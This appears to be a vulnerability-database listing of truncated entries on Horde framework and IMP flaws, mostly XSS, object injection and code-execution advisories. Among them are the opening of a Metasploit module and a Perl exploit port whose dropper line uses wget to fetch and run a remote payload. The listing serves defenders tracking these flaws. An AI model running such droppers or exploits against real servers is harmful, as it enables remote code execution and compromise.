EUVD-2007-1467
Malware in sbrugna...
UBUNTU-CVE-2025-30349
Horde IMP through 6.2.27, as used with Horde Application Framework through 5.2.23, allows XSS that leads to account takeover via a crafted text/html e-mail message with an onerror attribute that may use base64-encoded JavaScript code, as exploited in the wild in March 2025...
VulnCheck KEV: CVE-2025-30349
Horde IMP through 6.2.27, as used with Horde Application Framework through 5.2.23, allows XSS that leads to account takeover via a crafted text/html e-mail message with an onerror attribute that may use base64-encoded JavaScript code, as exploited in the wild in March 2025...
SUSE CVE-2006-3548
Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 allow remote attackers to inject arbitrary web script or HTML via a (1) javascript URI or an external (2) http, (3) https, or (4) ftp URI in the url parameter in services/go.php a...
SUSE CVE-2007-1473
Cross-site scripting (XSS) vulnerability in framework/NLS/NLS.php in Horde Framework before 3.1.4 RC1, when the login page contains a language selection box, allows remote attackers to inject arbitrary web script or HTML via the newlang parameter to login.php...
SUSE CVE-2009-0932
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the HordeImage driver name...
SUSE CVE-2009-4363
TextFilter/lib/Horde/Text/Filter/Xss.php in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 does not properly handle data: URIs, which allows remote attackers to conduct cross-site scripting (XSS) attacks via data:text/html...
SUSE CVE-2014-1691
The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the formvars form...
[SECURITY] Fedora 30 Update: php-horde-turba-4.2.24-1.fc30
Turba is the Horde contact management application. Leveraging the Horde framework to provide seamless integration with IMP and other Horde applications, it supports storing contacts in SQL, LDAP, Kolab, and IMSP address books...
CVE-2015-8807
Cross-site scripting (XSS) vulnerability in the renderVarInputnumber function in horde/framework/Core/lib/Horde/Core/Ui/VarRenderer/Html.php in Horde Groupware before 5.2.12 and Horde Groupware Webmail Edition before 5.2.12 allows remote attackers to inject arbitrary web script or HTML via vectors...
Horde Application Framework <= 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31107/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...
Horde Framework Unserialize PHP Code Execution
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...
Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/37351/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...
Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/37351/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...
Horde Framework <= 3.1.3 Login.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22984/info Horde Framework is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would execute in the context of th...
Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31110/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...
Horde Framework and IMP 2.x/3.x Cleanup Cron Script Arbitrary File Deletion Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22985/info Horde Framework and IMP are prone to a vulnerability that allows a local attacker to delete arbitrary files in the context of the user running the application. A successful attack can reduce the integrity of...
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...
Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)
An arbitrary PHP code execution vulnerability has been reported in Horde. An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...
UBUNTU-CVE-2014-1691
The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the formvars form...